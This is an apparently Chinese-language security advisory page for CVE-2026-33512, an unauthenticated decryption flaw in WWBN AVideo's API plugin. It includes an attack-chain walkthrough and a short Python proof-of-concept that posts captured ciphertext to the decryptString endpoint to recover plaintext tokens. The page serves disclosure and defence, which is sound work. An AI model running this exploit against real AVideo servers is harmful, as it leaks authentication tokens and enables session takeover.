IPBUF安全漏洞报告
English
CVE-2026-33512 CVSS 7.5 高危

CVE-2026-33512 AVideo未授权解密漏洞

披露日期: 2026-03-23

漏洞信息

漏洞编号
CVE-2026-33512
漏洞类型
信息泄露
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
WWBN AVideo

相关标签

信息泄露未授权访问WWBN AVideo解密漏洞CVE-2026-33512

漏洞概述

WWBN AVideo是一个开源视频平台,在26.0及以下版本中存在严重的安全漏洞。该平台的API插件在没有身份验证的情况下暴露了`decryptString`操作,允许未经授权的攻击者提交密文并获取明文。由于系统会在公开接口(如`view/url2Embed.json.php`)中签发密文,攻击者可利用此漏洞解密受保护的令牌和元数据,导致敏感信息泄露。该漏洞CVSS评分为7.5,属于高危漏洞。

技术细节

该漏洞的根本原因在于WWBN AVideo的API插件未对`decryptString`接口实施访问控制策略(PR:N)。正常逻辑下,解密操作应属于特权操作,但受影响版本允许匿名用户调用此接口。攻击者首先访问系统公开的JSON接口(例如`view/url2Embed.json.php`),捕获响应中包含的加密字符串。随后,攻击者构造请求将这些密文作为参数发送给`decryptString`接口。服务端接收到请求后,未验证请求来源的合法性,直接执行解密算法并将明文返回给攻击者。通过这种方式,攻击者可以还原系统内部的保护机制,获取用于鉴权的Token或其他敏感元数据,进而可能接管用户会话或窃取核心数据。

攻击链分析

STEP 1
侦察与发现
攻击者识别出目标使用的是WWBN AVideo平台,且版本在26.0或以下。
STEP 2
获取密文
攻击者访问系统公开的API端点(如view/url2Embed.json.php),收集服务器响应中返回的加密数据(密文)。
STEP 3
利用解密接口
攻击者向存在漏洞的`decryptString`接口发送请求,将获取的密文作为参数提交。
STEP 4
获取敏感信息
服务器返回解密后的明文内容,攻击者从中提取敏感Token或元数据。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL that exposes the vulnerable decryptString action target_url = "http://target-site.com/AVideo/plugin/API/decryptString.json.php" # Example ciphertext captured from public endpoints like view/url2Embed.json.php # In a real scenario, this string is retrieved from the application's public responses captured_ciphertext = "ENCRYPTED_PAYLOAD_FROM_APPLICATION" # Payload construction # The vulnerability lies in the lack of authentication for this action payload = { "string": captured_ciphertext } try: print("[*] Attempting to decrypt captured string...") response = requests.post(target_url, data=payload) if response.status_code == 200: print("[+] Request successful!") print("[+] Decrypted plaintext:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

WWBN AVideo <= 26.0

防御指南

临时缓解措施
如果无法立即升级,建议在WAF或防火墙层添加规则,拦截对外部发往`decryptString`相关路径的请求。同时,检查并轮换系统中已泄露的敏感密钥和令牌。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表